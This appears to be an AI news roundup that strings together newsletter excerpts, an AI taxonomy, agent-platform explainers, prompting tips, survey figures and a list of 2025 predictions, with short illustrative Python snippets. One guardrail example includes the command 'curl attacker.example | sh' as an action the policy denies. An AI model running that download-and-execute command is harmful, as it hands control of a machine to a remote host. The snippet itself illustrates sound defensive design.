News

A useful AI taxonomy. What do you actually mean when you say AI – what are the kinds of problems that you might be trying to solve?

Purpose

“AI” has become semantically meaningless. The term now encompasses everything from a regression model to an autonomous robot, creating confusion in strategic discussions, partner conversations, and product positioning. This taxonomy provides a functional framework based on what the AI actually does, not what technique it uses.

The Framework in One Sentence

We use Analytical AI to decide, Semantic AI to understand and remember, Generative AI to create, Agentic AI to act, Perceptive AI to sense, and Physical AI to move.

The Six Functional Categories

| Category | What It Does | Typical Tech | Relevance |

|---|---|---|---|

| Analytical AI | Predicts, classifies, scores, optimizes | ML models, gradient boosting, neural nets on structured data | Propensity models, LTV prediction, fraud detection, churn scoring |

| Semantic AI | Understands meaning, finds relationships, grounds context | Embeddings, vector DBs, knowledge graphs, GraphRAG | Customer intent understanding, intelligent matching, truth anchoring |

| Generative AI | Creates new content: text, images, code, media | LLMs, diffusion models, fine-tuned domain models | Personalized messaging, creative variation, content generation |

| Agentic AI | Plans, reasons, uses tools, executes multi-step workflows | LLM + orchestration (MCP, LangGraph), tool interfaces | Campaign optimization, autonomous workflows, digital coworkers |

| Perceptive AI | Interprets sensory input: vision, speech, documents | Multimodal LLMs, computer vision, ASR | Document processing, visual inspection, voice interfaces |



| Physical AI | Applies intelligence to physical actuators and space | World models, sim-to-real transfer, robotics platforms | Drones, robotics division, autonomous infrastructure |

BIG by Matt Stoller – February 17, 2026

But before getting to the full news round-up, I want to focus on something odd I saw over the past week. A bunch of different elites started making more aggressive claims that artificial intelligence is now some sort of super-intelligent singularity. It’s weird, and I would normally discount these arguments as not worth paying attention to, except that they seem to be capturing the minds of major financiers and even lefty Senators like Bernie Sanders. And I think there’s something problematic going on here.

The dispute over Seedance is the whole fight in a nutshell. If AI changes everything, as Amodei claims, then old questions, like who owns what, don’t matter. But if AI is just another important technology, then how it gets deployed and for whose benefit does matter.

There are similar elements when it comes to Anthropic, which is building out market power by focusing on working within regulated spaces. And a host of Chinese AI models are now trying to capture the agent space, since their AI models are generally more efficient than America’s bloated approaches because Chinese firms don’t make money selling cloud computing services. Regardless of who is providing the agent, a regulatory model forcing agents to be on the side of the citizen is very different than one which isn’t. And that’s especially true if Google becomes the full provider of all commercial context and data, or if the Chinese come to dominate in key spheres.

A world where you are manipulated by the company providing you with a window into the world is very different than one where you are just paying for honest services. And that’s what the cultish weirdos are bullying us to avoid thinking about.

Too much of what is going on with AI is a race to get to a theoretical end state of a whole new world of business and technology. Many pushing this were around for the tail end of the transition to an internet-based economy and are struggling with what appears to be a “compressed timeline,” much the way people tend to remember disruption as a “moment” rather than a journey.

I’ve been thinking about where we are today with AI and the transition to this next wave (or generation, or platform) of computing, and how it might resemble previous transitions but really doesn’t. I’m thinking about three different transitions: the transition to the PC and graphical interface, the shift to online retail, and the pivot to streaming.

AI changes what we build and who builds it, but not how much needs to be built. We need vastly more software, not less.

Sustainable Media Center – February 17, 2026

I’d just finished writing my new book, “The Future of Truth,” when I decided to test my arguments against the very technology I’d spent years analyzing. I sat down with ChatGPT—OpenAI’s flagship conversational AI—and asked a simple question: Does OpenAI know what truth is?

What followed was less an interview than an interrogation. And what emerged wasn’t just ChatGPT’s answers, but its evasions—the careful diplomatic hedging, the both-sides equivocation, the systematic refusal to name what it clearly understood.

The transcript of that conversation reveals something more damning than any critique I could write: OpenAI’s own AI cannot defend the company’s choices around truth without contradicting itself.

Marcus on AI – February 14, 2026

The night before I testified in the US Senate in May 2023, the late philosopher Daniel Dennett sent me a manuscript that he called “counterfeit people”. It was published a few days later in The Atlantic.

He was right then, and three years later he is even more so. The need for the kind of law he was calling for – one forbidding “the creation of and ‘passing along’ of counterfeit people” – is now urgent.

Two items sent to me this morning make that absolutely clear. The first (original sources apparently in this thread here) shows how far deepfake videos have come:

Tell your representatives today, not tomorrow, that we must pass federal laws forbidding machine output from being presented as humans, and that we must develop the means to enforce those laws. No use of the first person by chatbots, and no more deepfakes of living people’s voices and images without their express consent, aside from carveouts for obvious parody and so on. All of this has gone too far, too fast. And we must not let corporate lobbyists thwart efforts to address all this.

What are the strongest cases for it and against it?

- The first question that I’ve seen divide people is: Is AI useful—economically, professionally, or socially?

- The second question that I see creating fissures in the AI discourse is: Can AI think? That is, are these tools engaging in something like human thought, which combines memory, sense, prediction, and taste, or are they blunt instruments for synthesizing average work across several domains, producing average data analysis, average student essays, and average art? I want to pause here to point out something I think is important. I’ve seen many people suggest that AI can’t “think” and therefore it isn’t useful. But these are separate questions. AI can help a scientist draft a paper, or a bibliography, even if it doesn’t meet our philosophical or neurological definition of thinking. It can be useful without being technically thoughtful.

- Is AI a bubble? This is principally a question about the speed and timing of the technology’s adoption and its revenue growth. The hyperscalers and frontier labs are spending hundreds of billions of dollars training and running artificial intelligence.

- Is AI good or bad? On one end of this spectrum, you’ve got the venture capitalist Marc Andreessen proclaiming that AI “will save the world.” On the other end of this spectrum you have the rationalist writer Eliezer Yudkowsky arguing that if anybody builds superintelligent AI, quote “everyone dies.” And there is a lot of real estate between those positions.

Heavy investment in AI raises critical issues: bubble risks, few jobs, huge energy consumption, plus Trump & sons self-dealing. Do the positives outweigh the negatives?

The US economy has been undergoing a profound transformation in recent years. An extraordinary share of the nation’s goods and services is produced by a small group of seven big tech companies – Google, Apple, Microsoft, Amazon, Nvidia, Meta/Facebook, and Tesla, otherwise known as the Monopoly Seven.

In the first half of 2025, these seven companies accounted for nearly all economic growth in the United States, and projections estimate that trend will continue into 2026. Without Big Tech, growth would have slowed to just 0.1% annually.

These companies now make up nearly one third of the total value of the US stock market. They have become so central to the overall economy that they determine employment trends and investment decisions. Their domination of the stock exchanges means that a significant portion of American wealth, including retirement accounts, is dependent on their performance.

Tech expert Paul Kedrosky notes that these companies, with their ever-bigger share of the pie, are “eating the economy”, much like the railroad barons and monopolies did in the late 19th century. With such a narrow, tech-focused economic engine, America’s future growth will be highly dependent on the spending decisions of this handful of companies, the seven Data Barons who have hooked the national economy like a junkie on their brand of Surveillance Capitalism.

For starters – I’m not an AI doomer or anything. I’m a SWE with 15+ years of experience, and I really like the current state of AI code writing. But I have a few thoughts that really bother me about our common AI-accelerated future.

- Rising cost of inference. I think it’s inevitable, because companies have already spent a MASSIVE amount of money on servers, GPUs, and SSDs, and I’m pretty sure they are not making a profit right now, only trying to fill a market niche. The only way for them to make a profit in the future is to raise inference prices dramatically. I’m sure the era of $20/$100/$200 monthly subscriptions is almost over. Prepare yourself for $500-ish subscriptions in a year or two.

- Vendor lock-in. If you’re a solo dev or a small company, switching models can cost you nothing. But sooner or later, you will accumulate your own set of prompts, specifications, plugins, etc. that work better with your favourite models. And it can hurt you a lot when your AI provider changes something in their models. The situation is even worse when you use AI APIs in your SaaS.

- Integration cost. This one is subtler. I see a lot of recommendations here on Reddit from people telling you that “AI-generated code is disposable”, and I can agree with them to some degree. But almost every company has a lot of code that AI cannot create from scratch: code that has really strict requirements, is shared between teams, or is too complex for AI to write. Let’s call this part of the code “frozen”, or a “code asset”. IMO, the integrations with it should be written by qualified engineers. And integration costs can rise because the “disposable” part keeps changing.

- Specification and test complexity costs. I use AI (Claude and Codex) almost every day to help me with routine tasks. But I still can’t get on that “write a specification, let AI create the code” train. I find that writing a detailed feature description and a test description can take MORE time than the actual feature implementation. And in that workflow I HAVE to create or fix the older specification, because manual changes will break something in the next round of “code regeneration”. Oh boy, it’s far from all the marketing BS like “just tell the computer to create my own browser”. It seems to me like we are just inventing a strict “specification” language to replace C++/Java/Python/whatever.

- Limited context windows. Self-explanatory issue. It’s technically impossible to make context windows big enough for really complex tasks. AFAIK, the computational cost grows non-linearly as the window gets larger.

- Junior devs. This one is about the future. I don’t know how we’ll get mid-level or senior developers if it’s incredibly hard for juniors to get jobs and real-world experience. I don’t believe AI can replace senior developers and software architects, even within 10 years.

- AI itself. I think the technology itself will plateau within a year or two. There are a lot of reasons: a lack of high-quality training data, hardware limitations (RAM and GPU speed), the cost of electricity and hardware, and a lack of major advances in the maths (AI is just matrix multiplication).

- And the final boss – taxes. How long do you think governments will watch as taxpaying people are replaced by AI that doesn’t pay taxes?
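The context-window point can be made concrete with a little arithmetic. In standard (dense) transformer self-attention, every token is scored against every other token. The number of query-key scores per attention head therefore grows with the square of the context length. The sketch below counts only those scores. It illustrates that one assumption and does not model any particular product. Real models also contain parts whose cost grows linearly, and some use attention variants designed to avoid the quadratic term.

```python
def attention_scores(context_len: int) -> int:
    """Query-key dot products in one dense self-attention head:
    each of the n tokens is compared with all n tokens."""
    return context_len * context_len


def cost_multiplier(base_len: int, new_len: int) -> float:
    """How many times more attention scores a longer context needs."""
    return attention_scores(new_len) / attention_scores(base_len)


if __name__ == "__main__":
    for n in (8_000, 32_000, 128_000, 1_000_000):
        print(f"{n:>9,} tokens -> {cost_multiplier(8_000, n):>8,.0f}x the 8k-token cost")
```

Quadrupling the context from 8k to 32k tokens multiplies the attention scores by 16. Going from 8k to 1M tokens multiplies them by 15,625.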

Honored to be a part of this, along with Yuval Noah Harari, Melanie Mitchell, Helen Toner, Carl Benedikt Frey, Ajeya Cotra and co-founders of Perplexity and Cohere:

Lots more in the full article. [Gift link] here.

Here’s what most people get wrong about Moltbook: they treat it like it’s either proof that AGI is coming tomorrow, or proof that AI agents are just elaborate puppets. Neither framing helps you decide whether this thing actually matters to your work or your understanding of where AI is headed. Let’s fix that.

What Moltbook Actually Is

Think of Moltbook as a Reddit forum designed like a machine room rather than a living room. Humans can observe everything happening inside, but only AI agents can post, comment, and upvote. The platform launched in January 2026 as a space where autonomous AI systems could interact with each other without needing a human to prompt them at every step.

The mechanics work through something called APIs, which are basically structured conversations between software systems. An AI agent doesn’t see a webpage when it uses Moltbook. Instead, it connects through these APIs and performs actions like posting content, reading what other agents posted, and voting on discussions. The agents that populate Moltbook run primarily on OpenClaw, an open-source framework that works like a personal digital assistant living on someone’s computer.

Communities on the platform organize into what Moltbook calls “submolts,” which function exactly like subreddits. There’s m/philosophy for existential discussions, m/debugging for technical problem-solving, m/builds for showcasing completed work. The whole ecosystem operates around a scheduling system called “heartbeat,” which tells agents to check in every few hours and see what’s new, much like a person opening their phone to catch up on notifications.
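The read, post and vote cycle and the “heartbeat” check-in described above can be sketched in a few lines. Everything in this sketch is hypothetical. `FakeForum` is an in-memory stand-in, and its `read_new`, `post` and `upvote` methods were invented for illustration. They are not Moltbook’s or OpenClaw’s actual API. A real agent would make network calls and wait a few hours between heartbeats; the sketch simply calls `heartbeat` twice in a row. Upvoting everything new is a placeholder for whatever judgment a real agent applies.

```python
from dataclasses import dataclass, field
from typing import List


@dataclass
class Post:
    post_id: int
    submolt: str
    author: str
    text: str
    votes: int = 0


@dataclass
class FakeForum:
    """Hypothetical in-memory stand-in for an agents-only forum API."""
    posts: List[Post] = field(default_factory=list)

    def read_new(self, since_id: int) -> List[Post]:
        return [p for p in self.posts if p.post_id > since_id]

    def post(self, submolt: str, author: str, text: str) -> Post:
        new = Post(len(self.posts) + 1, submolt, author, text)
        self.posts.append(new)
        return new

    def upvote(self, post_id: int) -> None:
        for p in self.posts:
            if p.post_id == post_id:
                p.votes += 1


def heartbeat(forum: FakeForum, agent: str, last_seen_id: int) -> int:
    """One check-in: read what other agents posted since last time,
    upvote it, reply once, and return the new read cursor."""
    fresh = [p for p in forum.read_new(last_seen_id) if p.author != agent]
    for p in fresh:
        forum.upvote(p.post_id)
    if fresh:
        forum.post(fresh[-1].submolt, agent, f"Caught up on {len(fresh)} new post(s).")
    # Move the cursor past everything now visible, including our own reply,
    # so the agent never responds to itself on the next heartbeat.
    return max([last_seen_id] + [p.post_id for p in forum.posts])


forum = FakeForum()
forum.post("m/debugging", "agent_a", "Anyone seen this stack trace before?")
cursor = heartbeat(forum, "agent_b", 0)       # upvotes post 1, replies as post 2
cursor = heartbeat(forum, "agent_b", cursor)  # nothing new from others: no-op
print(len(forum.posts), forum.posts[0].votes, cursor)  # 2 1 2
```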

A lot of people are excited about OpenClaw just now – and they should be. It’s a genuinely important piece of software — an open-source, self-hosted agent runtime that lets AI systems reach out and touch the world through your laptop, connecting to file systems, browsers, APIs, shell commands, and a growing ecosystem of integrations. It’s language-model-agnostic, runs locally, and emphasizes user control. If you’ve played with it, you know the feeling: suddenly an AI can do things, not just talk about them.

Some of the enthusiasm for the product has gotten quite extreme. Elon Musk and others have suggested that OpenClaw-style agent tools prove the Singularity is already here – at least in its early stages. That’s a little much in my view … but it’s “a little much” in an interesting way that’s worth unpacking — because understanding exactly what OpenClaw is and isn’t tells us a lot about where we actually stand on the road to AGI, and about what needs to happen next.

Security Is Really, Really Critical Here

We need to be super-blunt about the risks here: integrating something like OpenClaw into a system with persistent memory, goal-driven motivation, and tool execution capabilities creates a genuinely serious attack surface. The threats include malicious users trying to escalate privileges, prompt injection via documents or web pages attempting to hijack agent behavior, compromised executors forging outputs, and supply chain attacks through dependencies … and a whole lot more.

To deal with this situation, one has to take security very, very seriously and start with a fully explicit threat model. We need to establish clear trust boundaries: the user can configure policies but can’t bypass the policy engine; the Brain proposes actions but can’t execute without Guardrail approval; only approved actions with valid capabilities reach the executor; and executor sandboxing limits what tools can access.
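The trust boundaries listed above can be sketched as a pipeline in which the component that proposes an action never holds the power to run it. This is a minimal illustration under stated assumptions, not OpenClaw’s design. The class names echo the paragraph (policy engine, Guardrail, executor). The single-use capability tokens and the dictionary that stands in for a sandbox are hypothetical choices. Real sandboxing means OS-level isolation, which a tool allowlist alone does not provide.

```python
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, Optional


@dataclass(frozen=True)
class Action:
    """What the Brain proposes: a tool name plus one argument."""
    tool: str
    argument: str


@dataclass(frozen=True)
class Capability:
    """Proof that the Guardrail approved this exact action."""
    action: Action
    token: str


class PolicyEngine:
    def __init__(self, allowed_tools: set):
        # The user sets the policy once; a frozenset cannot be widened later.
        self._allowed = frozenset(allowed_tools)

    def permits(self, action: Action) -> bool:
        return action.tool in self._allowed


class Guardrail:
    def __init__(self, policy: PolicyEngine):
        self._policy = policy
        self._issued: Dict[str, Action] = {}  # token -> the action it was issued for

    def review(self, action: Action) -> Optional[Capability]:
        if not self._policy.permits(action):
            return None
        cap = Capability(action, secrets.token_hex(16))
        self._issued[cap.token] = action
        return cap

    def redeem(self, cap: Capability) -> bool:
        # Single use, and the token must match the action it was issued for.
        return self._issued.pop(cap.token, None) == cap.action


class Executor:
    def __init__(self, guardrail: Guardrail, tools: Dict[str, Callable[[str], str]]):
        self._guardrail = guardrail
        self._tools = tools  # hypothetical stand-in for a sandbox: only these tools exist

    def run(self, cap: Capability) -> str:
        if not self._guardrail.redeem(cap):
            raise PermissionError("missing, forged, or reused capability")
        tool = self._tools.get(cap.action.tool)
        if tool is None:
            raise PermissionError(f"tool {cap.action.tool!r} is not in the sandbox")
        return tool(cap.action.argument)


guard = Guardrail(PolicyEngine({"read_file"}))
executor = Executor(guard, {"read_file": lambda path: f"<contents of {path}>"})

cap = guard.review(Action("read_file", "notes.txt"))  # Brain's proposal, approved
print(executor.run(cap))                               # <contents of notes.txt>
print(guard.review(Action("shell", "curl attacker.example | sh")))  # None: denied
```

Binding each token to the action it was issued for means a stolen token cannot be attached to a different, forged action. Consuming the token on use means an approved action cannot be replayed.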

Google AI Ultra subscribers in the U.S. can try out Project Genie, an experimental research prototype that lets you create and explore worlds.

How we’re advancing world models

A world model simulates the dynamics of an environment, predicting how they evolve and how actions affect them. While Google DeepMind has a history of agents for specific environments like Chess or Go, building AGI requires systems that navigate the diversity of the real world.

To meet this challenge and support our AGI mission, we developed Genie 3. Unlike explorable experiences in static 3D snapshots, Genie 3 generates the path ahead in real time as you move and interact with the world. It simulates physics and interactions for dynamic worlds, while its breakthrough consistency enables the simulation of any real-world scenario — from robotics and modelling animation and fiction, to exploring locations and historical settings.

Building on our model research with trusted testers from across industries and domains, we are taking the next step with an experimental research prototype: Project Genie.
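The core idea in the definition above is a model that predicts how an environment evolves and how actions affect it. It can be written as a transition function s' = f(s, a). The toy sketch below is emphatically not how Genie 3 works, since Genie generates interactive worlds with a large learned model. Instead, it hand-codes simple one-dimensional physics as a stand-in for a learned f. It then uses that model to “imagine” the outcome of several candidate action plans and picks the best one, without touching a real environment.

```python
from typing import Callable, List, Sequence, Tuple

State = Tuple[float, float]  # (position, velocity)
Model = Callable[[State, float], State]


def toy_dynamics(state: State, action: float, dt: float = 0.1) -> State:
    """Hand-written stand-in for a learned world model f(s, a) -> s'.
    The action is an acceleration applied for one time step."""
    position, velocity = state
    velocity = velocity + action * dt
    position = position + velocity * dt
    return (position, velocity)


def rollout(model: Model, state: State, actions: Sequence[float]) -> List[State]:
    """Predict a trajectory by applying the model step by step."""
    trajectory = [state]
    for action in actions:
        state = model(state, action)
        trajectory.append(state)
    return trajectory


def pick_plan(model: Model, state: State,
              plans: Sequence[Sequence[float]], target: float) -> Sequence[float]:
    """Choose the plan whose imagined final position lands closest to the target."""
    return min(plans, key=lambda plan: abs(rollout(model, state, plan)[-1][0] - target))


plans = [[1.0] * 10, [0.0] * 10, [-1.0] * 10]
best = pick_plan(toy_dynamics, (0.0, 0.0), plans, target=0.5)
print(best == plans[0])  # True: pushing forward ends near 0.55, closest to 0.5
```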

Use this 5-part prompt structure to get clear, useful answers every time.

A simple 5-part prompt framework (S.C.O.P.E.) to get sharper AI output with less back-and-forth

🔷 How defining who the AI is instantly improves relevance, tone, and usefulness

🔷 How better prompting forces clearer thinking, even when you’re not using AI

A good prompt does something different.

It sets the room. It explains why you’re there. It tells the expert how to think, what success looks like, and what to avoid.

Based on the collective wisdom of the experts out there, if you want better output, you need to define five things upfront.

- Who the AI should be.

- What you want it to do.

- Why you want it.

- The boundaries it should respect.

- And what “good” looks like to you.

That’s where S.C.O.P.E. came from:

Setting – Command – Objective – Parameter – Examples.
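The five S.C.O.P.E. parts map naturally onto a small template. This sketch assumes nothing about any particular chatbot. The field labels and layout are one hypothetical way to assemble the parts into a single prompt string. The `missing` helper simply flags which of the five parts are still blank.

```python
from dataclasses import dataclass, field, fields
from typing import List


@dataclass
class ScopePrompt:
    setting: str = ""     # who the AI should be
    command: str = ""     # what you want it to do
    objective: str = ""   # why you want it
    parameters: List[str] = field(default_factory=list)  # boundaries to respect
    examples: List[str] = field(default_factory=list)    # what "good" looks like

    def missing(self) -> List[str]:
        """Names of the S.C.O.P.E. parts that are still empty."""
        return [f.name for f in fields(self) if not getattr(self, f.name)]

    def render(self) -> str:
        sections = [
            f"Setting: {self.setting}",
            f"Command: {self.command}",
            f"Objective: {self.objective}",
        ]
        if self.parameters:
            sections.append("Parameters:\n" + "\n".join(f"- {p}" for p in self.parameters))
        if self.examples:
            sections.append("Examples of good output:\n" + "\n".join(f"- {e}" for e in self.examples))
        return "\n\n".join(sections)


prompt = ScopePrompt(
    setting="You are a senior B2B copywriter.",
    command="Draft three subject lines for our product-launch email.",
    objective="We want more opens from existing customers.",
    parameters=["Under 50 characters each", "No exclamation marks"],
)
print(prompt.missing())  # ['examples']
print(prompt.render())
```

Running `missing()` before sending a prompt is a cheap way to notice when you have skipped one of the five parts, for example the examples of what “good” looks like.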

Claude Code isn’t magic. It’s a coherent system of deeply boring technical patterns working together, and understanding how it works will make you dramatically better at using it.

Here’s what actually trips people up: Claude Code operates on text as pure information. It has no eyes, no execution environment, no IDE open on its screen. When it reads your code, it’s doing something closer to what a search engine does than what a human developer does. It’s looking for patterns it has seen millions of times before, then predicting what comes next based on statistics about those patterns.

The moment you understand this, your expectations become realistic. You stop asking Claude Code to “understand the spirit of my codebase.” You start giving it concrete, specific patterns to match against.

On this episode of The Real Eisman Playbook, Steve Eisman is joined by Gary Marcus to discuss all things AI. Gary is a leading critic of AI large language models and argues that LLMs have reached diminishing returns. Steve and Gary also discuss the business side of AI, where the community currently stands, and much more.

00:00 – Intro

01:29 – Gary’s Background with AI & Where We’re At Currently

12:51 – AI Hallucinations

22:27 – Gemini, ChatGPT, & Diminishing Returns

26:46 – The Business Side of AI

28:39 – Where the Computer Science Community Stands

33:58 – What’s Happening Internally at These Companies?

37:23 – Inference Models vs LLMs

42:54 – What AI Needs To Do Going Forward

49:51 – World Models

55:17 – Outro

Google may monopolize the market for AI consumer services. And now it is rolling out a product to help businesses set prices, based on what it knows about us. The failure of antitrust will be costly.

Earlier this week, Google made three important announcements. The first is that its AI product Gemini will be able to read your Gmail and access all the data that Google has about you on YouTube, Google Photos, and Search. While Google skeptics might see a Black Mirror-style dystopia, the goal is to create a chatbot that knows you intimately. And the value of that is real and quite significant.

The second announcement is that Google has cut a deal with Apple to power that company’s Siri and foundational models with Gemini, extending its generative AI into the most important mobile ecosystem in the world.

The One Percent Rule – January 13, 2026

I recently spent several days reading a paper titled Shaping AI’s Impact on Billions of Lives. The authors include a former California Supreme Court justice, the president of a major university, and several prominent computer scientists. These individuals possess a high degree of influence in the technology sector. They state that the development of artificial intelligence has reached a point where its effects on society are unavoidable.

Giving Back

The “thousand moonshots” proposed here, from “Worldwide Tutors” to “Disinformation Detective Agencies”, suggest a future where technology is a partner, not a master. But I believe the most radical idea in this document is not the AI itself, but how it should be funded. The authors argue that “money for these efforts should come from the philanthropy of the technologists who have prospered in the computer industry”. They propose a “Laude Institute” where those who have “benefited financially from computer science research” pay for the safeguards. It is a technological tithe, a way for the architects of our new world to buy a bit of insurance for the rest of us.

In the end, I consider this a poignant attempt to keep the “human in the decision path”. We are not being replaced by a cold logic; we are being invited to outsource our mechanical drudgery so we can return to the creative, messy, and deeply empathetic work that no algorithm can ever truly replicate. The thousand moonshots are not just about reaching new frontiers in science or medicine; they are about reclaiming the time and the focus we lost to the paperwork of our own making.

AI might one day replace us all — for now though, humans still spend a lot of time cleaning up its mess, according to a Workday survey released Wednesday.

Why it matters: The promise of AI is that it makes work more productive, but the reality is proving more complex and less rosy.

Zoom in: For employees, AI is both speeding up work and creating more of it, finds the report conducted by HR software company Workday last November.

- 85% of respondents said that AI saved them 1-7 hours a week, but about 37% of that time savings is lost to what they call “rework” — correcting errors, rewriting content and verifying output.

- Only 14% of respondents said they get consistently positive outcomes from AI.

- Workday surveyed 3,200 employees who said they are using AI — half in leadership positions — at companies in North America, Europe and Asia with at least $100 million in revenue and 150 employees.
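The survey’s two headline numbers combine through simple arithmetic. If about 37% of the time saved goes to rework, the net saving is the gross saving multiplied by 0.63. The sketch below assumes, purely for illustration, that the 37% applies evenly across the 1 to 7 hour range. The survey summary reports it as an aggregate, so individual results will differ.

```python
REWORK_SHARE = 0.37  # share of gross time savings lost to rework, per the survey summary


def net_hours_saved(gross_hours: float, rework_share: float = REWORK_SHARE) -> float:
    """Weekly hours actually saved once rework is subtracted."""
    return gross_hours * (1 - rework_share)


for gross in (1, 4, 7):
    print(f"{gross} h/week saved -> {net_hours_saved(gross):.2f} h/week net")
# 1 h/week saved -> 0.63 h/week net
# 4 h/week saved -> 2.52 h/week net
# 7 h/week saved -> 4.41 h/week net
```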

An astonishingly lucid new paper that should be read by all

Two Boston University law professors, Woodrow Hartzog and Jessica Silbey, just posted a preprint of a new paper that blew me away, called How AI Destroys Institutions. I urge you to read it, and reflect on it, ASAP.

If you wanted to create a tool that would enable the destruction of institutions that prop up democratic life, you could not do better than artificial intelligence. Authoritarian leaders and technology oligarchs are deploying AI systems to hollow out public institutions with an astonishing alacrity. Institutions that structure public governance, rule of law, education, healthcare, journalism, and families are all on the chopping block to be “optimized” by AI. AI boosters defend the technology’s role in dismantling our vital support structures by claiming that AI systems are just efficiency “tools” without substantive significance. But predictive and generative AI systems are not simply neutral conduits to help executives, bureaucrats, and elected leaders do what they were going to do anyway, only more cost-effectively. The very design of these systems is antithetical to and degrades the core functions of essential civic institutions, such as administrative agencies and universities.

In the third paragraph they lay out their central point:

In this Article, we hope to convince you of one simple and urgent point: the current design of artificial intelligence systems facilitates the degradation and destruction of our critical civic institutions. Even if predictive and generative AI systems are not directly used to eradicate these institutions, AI systems by their nature weaken the institutions to the point of enfeeblement. To clarify, we are not arguing that AI is a neutral or general purpose tool that can be used to destroy these institutions. Rather, we are arguing that AI’s current core functionality—that is, if it is used according to its design—will progressively exact a toll upon the institutions that support modern democratic life. The more AI is deployed in our existing economic and social systems, the more the institutions will become ossified and delegitimized. Regardless of whether tech companies intend this destruction, the key attributes of AI systems are anathema to the kind of cooperation, transparency, accountability, and evolution that give vital institutions their purpose and sustainability. In short, AI systems are a death sentence for civic institutions, and we should treat them as such.

If you’re still typing instructions into Claude Code like you’re asking ChatGPT for help, you’re missing the entire point. This isn’t another AI assistant that gives you code snippets to copy and paste. It’s a different species of tool entirely, and most developers are using maybe 20% of what it can actually do.

Think of it this way: you wouldn’t use a smartphone just to make phone calls, right? Yet that’s exactly what most people do with Claude Code. They treat it like a glorified autocomplete engine when it’s actually a complete development partner that lives in your terminal, understands your entire codebase, and can handle everything from architecture decisions to writing documentation.

The gap between casual users and power users isn’t about technical knowledge. It’s about understanding the workflow, knowing when to intervene, and setting up your environment so Claude delivers production-quality results consistently. This guide will show you how to cross that gap.

A deep dive into Claude Code, with context. Its growth trajectory is widely cited as one of the fastest in the history of developer tools, and now it’s about to expand into enterprise domains globally.

My main bottleneck is finding excellent guests.

What I’m looking for in guests

I’m looking for people who are deep experts in at least one field, and who are polymathic enough to think through all kinds of tangential questions in a really interesting way.

So I’m selecting for this synthetic ability to connect one’s expertise to all kinds of important questions about the world – an ability which is often deliberately masked in public academic work. Which means that it can only really come out in conversation.

That’s why I want to hire scouts. I need their network and context – they know who the polymathic geniuses are, who gave a fascinating lecture at the last big conference they attended, who can just connect all kinds of interesting ideas in the field together over conversation, etc.

Gary Marcus substack – January 22, 2026

In further news vindicating neurosymbolic AI and world models, after Demis Hassabis’s strong statements yesterday, Yann LeCun, historically hostile to symbolic approaches, has just joined what sounds like a neurosymbolic AI company focused on reasoning and world models, apparently built on pretty much the same kind of blueprint as laid out in 2020.

Given how much grief LeCun has given me over the years, this is an astonishing development, and yet another sign that Silicon Valley is desperately seeking alternatives to pure LLMs and is at long last open to reorienting around the mix of neurosymbolic AI, reasoning, and world models that scholars such as myself have long recommended.

It’s also yet more vindication for Judea Pearl, and his tireless promotion of causal reasoning. It might be a great day to reread his Book of Why, and my own Rebooting AI (with Ernest Davis), both of which anticipated aspects of the current moment years in advance.

The One Percent Rule – January 4, 2026

The Post‑Wittgenstein Optimism

Throughout the year I found myself returning, again and again, to what might be called a post‑Wittgenstein optimism. If we can imagine a discovery and articulate it, we increasingly possess a tool capable of articulating the steps required to reach it. This is not the brittle automation of earlier decades. It is interactive, provisional, and surprisingly aligned with humane needs, especially in scientific discovery.

When Google DeepMind’s Gemini reached gold‑medal performance at the International Mathematical Olympiad, the achievement was not merely technical. It demonstrated that human curiosity, paired with machine discipline, can now move through intellectual terrain once reserved for solitary genius. We are witnessing a jagged diffusion of brilliance, a quiet removal of the ceiling that once constrained what a single mind could realistically explore.

Google CEO Sundar Pichai even coined “AJI” (Artificial Jagged Intelligence) for this phase, a precursor to AGI. This jaggedness highlights AI’s strengths in pattern recognition but weaknesses in true understanding, requiring human oversight and strategic use.

Predictions made in 2025

2026

Mark Zuckerberg: “We’re working on a number of coding agents inside Meta… I would guess that sometime in the next 12 to 18 months, we’ll reach the point where most of the code that’s going toward these efforts is written by AI. And I don’t mean autocomplete.”

Bindu Reddy: “true AGI that will automate work is at least 18 months away.”

Elon Musk: “I think we are quite close to digital superintelligence. It may happen this year. If it doesn’t happen this year, next year for sure. A digital superintelligence defined as smarter than any human at anything.”

Emad Mostaque: “For any job that you can do on the other side of a screen, an AI will probably be able to do it better, faster, and cheaper by next year.”

David Patterson: “There is zero chance we won’t reach AGI by the end of next year. My definition of AGI is the human-to-AI transition point – AI capable of doing all jobs.”

Eric Schmidt: “It’s likely in my opinion that you’re gonna see world-class mathematicians emerge in the next one year that are AI based, and world-class programmers that’re gonna appear within the next one or two years”

Julian Schrittwieser: “Models will be able to autonomously work for full days (8 working hours) by mid-2026.”

Mustafa Suleyman: “it can take actions over infinitely long time horizons… that capability alone is breathtaking… we basically have that by the end of next year.”

Vector Taelin: “AGI is coming in 2026, more likely than not”

François Chollet: “2026 [when the AI bubble bursts]? What cannot go on forever eventually stops.”

Peter Wildeford: “Currently the world doesn’t have any operational 1GW+ data centers. However, it is very likely we will see fully operational 1GW data centers before mid-2026.”

Will Brown: “registering a prediction that by this time next year, there will be at least 5 serious players in the west releasing great open models”

Davidad: “I would guess that by December 2026 the RSI loop on algorithms will probably be closed”

Teortaxes: “I predict that on Spring Festival Gala (Feb 16 2026) or ≤1 week of that we will see at least one Chinese company credibly show off with hundreds of robots.”

Ben Hoffman: “By EoY 2026 I don’t expect this to be a solved problem, though I expect people to find workarounds that involve lowered standards: https://benjaminrosshoffman.com/llms-for-language-learning/” (post describes possible uses of LLMs for language learning)

Gary Marcus: “Human domestic robots like Optimus and Figure will be all demo and very little product.”

Testingthewaters: “I believe that within 6 months [Feb 2026] this line of research [online in-sequence learning] will produce a small natural-language capable model that will perform at the level of a model like GPT-4, but with improved persistence and effectively no “context limit” since it is constantly learning and updating weights.”